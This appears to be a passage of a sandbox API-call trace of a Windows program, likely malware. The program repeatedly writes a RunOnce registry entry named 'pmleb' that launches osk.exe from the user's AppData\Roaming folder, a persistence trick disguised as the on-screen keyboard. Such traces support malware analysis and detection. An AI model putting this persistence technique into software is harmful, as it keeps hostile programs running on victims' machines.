ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.045] SetTimer (hWnd=0x20280, nIDEvent=0x2154, uElapse=0xa, lpTimerFunc=0x0) returned 0x2154 [0084.045] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.058] KillTimer (hWnd=0x20280, uIDEvent=0x2154) returned 1 [0084.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.060] RegCloseKey (hKey=0x280) returned 0x0 [0084.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.060] SetTimer (hWnd=0x20280, nIDEvent=0x2155, uElapse=0xa, lpTimerFunc=0x0) returned 0x2155 [0084.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.074] KillTimer (hWnd=0x20280, uIDEvent=0x2155) returned 1 [0084.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.075] RegCloseKey (hKey=0x280) returned 0x0 [0084.075] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.075] SetTimer (hWnd=0x20280, nIDEvent=0x2156, uElapse=0xa, lpTimerFunc=0x0) returned 0x2156 [0084.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.090] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.090] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.090] KillTimer (hWnd=0x20280, uIDEvent=0x2156) returned 1 [0084.090] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.091] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.091] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.091] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.091] RegCloseKey (hKey=0x280) returned 0x0 [0084.091] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.091] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.091] SetTimer (hWnd=0x20280, nIDEvent=0x2157, uElapse=0xa, lpTimerFunc=0x0) returned 0x2157 [0084.091] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.105] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.105] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.105] KillTimer (hWnd=0x20280, uIDEvent=0x2157) returned 1 [0084.106] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.106] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.106] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.106] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.106] RegCloseKey (hKey=0x280) returned 0x0 [0084.106] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.107] SetTimer (hWnd=0x20280, nIDEvent=0x2158, uElapse=0xa, lpTimerFunc=0x0) returned 0x2158 [0084.107] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.121] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.121] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.121] KillTimer (hWnd=0x20280, uIDEvent=0x2158) returned 1 [0084.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.121] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.121] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.122] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.122] RegCloseKey (hKey=0x280) returned 0x0 [0084.122] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.122] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.122] SetTimer (hWnd=0x20280, nIDEvent=0x2159, uElapse=0xa, lpTimerFunc=0x0) returned 0x2159 [0084.122] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.156] KillTimer (hWnd=0x20280, uIDEvent=0x2159) returned 1 [0084.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.156] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.156] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.157] RegCloseKey (hKey=0x280) returned 0x0 [0084.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.157] SetTimer (hWnd=0x20280, nIDEvent=0x215a, uElapse=0xa, lpTimerFunc=0x0) returned 0x215a [0084.157] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.167] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.167] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.168] KillTimer (hWnd=0x20280, uIDEvent=0x215a) returned 1 [0084.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.168] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.168] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.169] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.169] RegCloseKey (hKey=0x280) returned 0x0 [0084.169] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.169] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.169] SetTimer (hWnd=0x20280, nIDEvent=0x215b, uElapse=0xa, lpTimerFunc=0x0) returned 0x215b [0084.169] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.183] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.183] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.183] KillTimer (hWnd=0x20280, uIDEvent=0x215b) returned 1 [0084.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.184] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.184] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.184] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.184] RegCloseKey (hKey=0x280) returned 0x0 [0084.184] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.185] SetTimer (hWnd=0x20280, nIDEvent=0x215c, uElapse=0xa, lpTimerFunc=0x0) returned 0x215c [0084.185] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.199] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.199] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.199] KillTimer (hWnd=0x20280, uIDEvent=0x215c) returned 1 [0084.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.199] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.200] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.200] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.200] RegCloseKey (hKey=0x280) returned 0x0 [0084.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.200] SetTimer (hWnd=0x20280, nIDEvent=0x215d, uElapse=0xa, lpTimerFunc=0x0) returned 0x215d [0084.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.214] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.214] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.214] KillTimer (hWnd=0x20280, uIDEvent=0x215d) returned 1 [0084.215] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.215] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.215] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.215] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.216] RegCloseKey (hKey=0x280) returned 0x0 [0084.216] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.216] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.216] SetTimer (hWnd=0x20280, nIDEvent=0x215e, uElapse=0xa, lpTimerFunc=0x0) returned 0x215e [0084.216] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.231] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.231] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.231] KillTimer (hWnd=0x20280, uIDEvent=0x215e) returned 1 [0084.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.232] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.232] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.233] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.233] RegCloseKey (hKey=0x280) returned 0x0 [0084.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.234] SetTimer (hWnd=0x20280, nIDEvent=0x215f, uElapse=0xa, lpTimerFunc=0x0) returned 0x215f [0084.234] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.246] KillTimer (hWnd=0x20280, uIDEvent=0x215f) returned 1 [0084.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.247] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.247] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.247] RegCloseKey (hKey=0x280) returned 0x0 [0084.247] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.248] SetTimer (hWnd=0x20280, nIDEvent=0x2160, uElapse=0xa, lpTimerFunc=0x0) returned 0x2160 [0084.248] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.262] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.262] KillTimer (hWnd=0x20280, uIDEvent=0x2160) returned 1 [0084.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.263] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.263] RegCloseKey (hKey=0x280) returned 0x0 [0084.263] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.264] SetTimer (hWnd=0x20280, nIDEvent=0x2161, uElapse=0xa, lpTimerFunc=0x0) returned 0x2161 [0084.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.277] KillTimer (hWnd=0x20280, uIDEvent=0x2161) returned 1 [0084.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.278] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.278] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.278] RegCloseKey (hKey=0x280) returned 0x0 [0084.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.279] SetTimer (hWnd=0x20280, nIDEvent=0x2162, uElapse=0xa, lpTimerFunc=0x0) returned 0x2162 [0084.279] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.293] KillTimer (hWnd=0x20280, uIDEvent=0x2162) returned 1 [0084.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.293] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.293] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.294] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.294] RegCloseKey (hKey=0x280) returned 0x0 [0084.294] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.294] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.294] SetTimer (hWnd=0x20280, nIDEvent=0x2163, uElapse=0xa, lpTimerFunc=0x0) returned 0x2163 [0084.294] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.309] KillTimer (hWnd=0x20280, uIDEvent=0x2163) returned 1 [0084.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.309] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.309] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.310] RegCloseKey (hKey=0x280) returned 0x0 [0084.310] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.310] SetTimer (hWnd=0x20280, nIDEvent=0x2164, uElapse=0xa, lpTimerFunc=0x0) returned 0x2164 [0084.310] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.324] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.324] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.324] KillTimer (hWnd=0x20280, uIDEvent=0x2164) returned 1 [0084.324] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.325] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.325] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.325] RegCloseKey (hKey=0x280) returned 0x0 [0084.325] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.325] SetTimer (hWnd=0x20280, nIDEvent=0x2165, uElapse=0xa, lpTimerFunc=0x0) returned 0x2165 [0084.325] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.339] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.339] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.340] KillTimer (hWnd=0x20280, uIDEvent=0x2165) returned 1 [0084.340] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.340] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.340] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.341] RegCloseKey (hKey=0x280) returned 0x0 [0084.341] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.341] SetTimer (hWnd=0x20280, nIDEvent=0x2166, uElapse=0xa, lpTimerFunc=0x0) returned 0x2166 [0084.341] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.355] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.355] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.355] KillTimer (hWnd=0x20280, uIDEvent=0x2166) returned 1 [0084.356] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.356] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.356] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 